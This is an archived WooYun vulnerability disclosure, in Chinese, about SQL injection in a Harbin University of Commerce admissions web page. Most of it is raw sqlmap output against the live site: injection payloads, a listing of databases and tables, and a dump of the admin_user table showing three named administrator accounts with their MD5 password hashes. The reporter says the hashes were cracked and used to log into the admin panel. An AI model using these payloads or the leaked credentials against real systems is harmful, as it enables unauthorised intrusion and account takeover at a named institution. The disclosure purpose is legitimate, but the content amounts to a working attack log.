乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-11: 细节已通知厂商并且等待厂商处理中 2015-02-16: 厂商已经主动忽略漏洞,细节向公众公开
RT
哈商大本科招生信息网,http://zsb.hrbcu.edu.cn/markPResult.php?id=jxs存在注入点
注入点 http://zsb.hrbcu.edu.cn/markPResult.php?id=jxs
[01:01:48] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: Apache 2.2.21, PHP 5.3.8back-end DBMS: MySQL 5.0[01:01:48] [INFO] fetching database namesavailable databases [9]:[*] cdcol[*] hrb1[*] information_schema[*] mysql[*] performance_schema[*] phpmyadmin[*] test[*] webauth[*] xscC:\sqlmap>sqlmap -u http://zsb.hrbcu.edu.cn/markPResult.php?id=jxs -D hrb1 --tales _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150128}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutua consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers assume no liability and are not resposible for any misuse or damage caused by this program[*] starting at 00:53:58[00:53:59] [INFO] resuming back-end DBMS 'mysql'[00:53:59] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requsts:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=jxs' AND 3525=3525 AND 'oBkI'='oBkI Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=jxs' AND (SELECT 3143 FROM(SELECT COUNT(*),CONCAT(0x717a707671,SELECT (CASE WHEN (3143=3143) THEN 1 ELSE 0 END)),0x716a7a6b71,FLOOR(RAND(0)*2)x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RytH'='RytH Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: id=jxs' UNION ALL SELECT CONCAT(0x717a707671,0x4b775a685054564a445,0x716a7a6b71)# Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: id=jxs'; SELECT SLEEP(5)-- Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=jxs' AND SLEEP(5) AND 'EJyh'='EJyh---[00:53:59] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: Apache 2.2.21, PHP 5.3.8back-end DBMS: MySQL 5.0[00:53:59] [INFO] fetching tables for database: 'hrb1'Database: hrb1[18 tables]+---------------------+| admin_user || college || eduguide || fangke || in_out || luqufenshu || luqufenshu_full || luqufenshu_info || luqujieguo || luquxinxi || major || online || zhaosheng_gonggao || zhaosheng_xinxi || zhaosheng_zhengce || zhaoshengjihua || zhaoshengjihua_full || zhaoshengjihua_info |+---------------------+C:\sqlmap>sqlmap -u http://zsb.hrbcu.edu.cn/markPResult.php?id=jxs -D hrb1 -T admin_user --columns _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150128}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 00:54:27[00:54:27] [INFO] resuming back-end DBMS 'mysql'[00:54:27] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=jxs' AND 3525=3525 AND 'oBkI'='oBkI Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=jxs' AND (SELECT 3143 FROM(SELECT COUNT(*),CONCAT(0x717a707671,(SELECT (CASE WHEN (3143=3143) THEN 1 ELSE 0 END)),0x716a7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RytH'='RytH Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: id=jxs' UNION ALL SELECT CONCAT(0x717a707671,0x4b775a685054564a4450,0x716a7a6b71)# Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: id=jxs'; SELECT SLEEP(5)-- Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=jxs' AND SLEEP(5) AND 'EJyh'='EJyh---[00:54:28] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: Apache 2.2.21, PHP 5.3.8back-end DBMS: MySQL 5.0[00:54:28] [INFO] fetching columns for table 'admin_user' in database 'hrb1'Database: hrb1Table: admin_user[4 columns]+-----------------+-------------+| Column | Type |+-----------------+-------------+| admin_user_id | int(3) || admin_user_name | varchar(30) || admin_user_pwd | varchar(32) || admin_user_time | int(12) |+-----------------+-------------+[00:54:28] [INFO] fetched data logged to text files under 'C:\Documents and Settings\Administrator\.sqlmap\output\zsb.hrbcu.edu.cn'[*] shutting down at 00:54:28C:\sqlmap>sqlmap -u http://zsb.hrbcu.edu.cn/markPResult.php?id=jxs -D hrb1 -T admin_user -C "admin_user_name, admin_user_pwd" --dump _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150128}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 00:54:59[00:54:59] [INFO] resuming back-end DBMS 'mysql'[00:54:59] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=jxs' AND 3525=3525 AND 'oBkI'='oBkI Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=jxs' AND (SELECT 3143 FROM(SELECT COUNT(*),CONCAT(0x717a707671,(SELECT (CASE WHEN (3143=3143) THEN 1 ELSE 0 END)),0x716a7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RytH'='RytH Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: id=jxs' UNION ALL SELECT CONCAT(0x717a707671,0x4b775a685054564a4450,0x716a7a6b71)# Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: id=jxs'; SELECT SLEEP(5)-- Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=jxs' AND SLEEP(5) AND 'EJyh'='EJyh---[00:55:00] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: Apache 2.2.21, PHP 5.3.8back-end DBMS: MySQL 5.0[00:55:00] [INFO] fetching columns 'admin_user_name, admin_user_pwd' for table 'admin_user' in database 'hrb1'[00:55:00] [WARNING] reflective value(s) found and filtering out[00:55:00] [INFO] fetching entries of column(s) 'admin_user_name, admin_user_pwd' for table 'admin_user' in database 'hrb1'[00:55:00] [INFO] analyzing table dump for possible password hashes[00:55:00] [INFO] recognized possible password hashes in column 'admin_user_pwd'do you want to store hashes to a temporary file for eventual further processingwith other tools [y/N]do you want to crack them via a dictionary-based attack? [Y/n/q][00:55:04] [INFO] using hash method 'md5_generic_passwd'what dictionary do you want to use?[1] default dictionary file 'C:\sqlmap\txt\wordlist.zip' (press Enter)[2] custom dictionary file[3] file with list of dictionary files> 1[00:55:05] [INFO] using default dictionarydo you want to use common password suffixes? (slow!) [y/N][00:55:07] [INFO] starting dictionary-based cracking (md5_generic_passwd)[00:55:07] [INFO] starting 2 processes[00:55:52] [WARNING] no clear password(s) found[00:55:52] [INFO] postprocessing table dumpDatabase: hrb1Table: admin_user[3 entries]+-----------------+----------------------------------+| admin_user_name | admin_user_pwd |+-----------------+----------------------------------+| admin | 4d42625a4f1ceabfd9b0adedce5de94d || wangtao | d163056c96097754156677a7375753ef || fengjianyuan | d21abcb248174f8227db16aa3a833eca |+-----------------+----------------------------------+
|admin | 4d42625a4f1ceabfd9b0adedce5de94d || wangtao | d163056c96097754156677a7375753ef || fengjianyuan | d21abcb248174f8227db16aa3a833eca |md5解密后,登陆后台。http://zsb.hrbcu.edu.cn/admin
过滤
危害等级:无影响厂商忽略
忽略时间:2015-02-16 10:32
暂无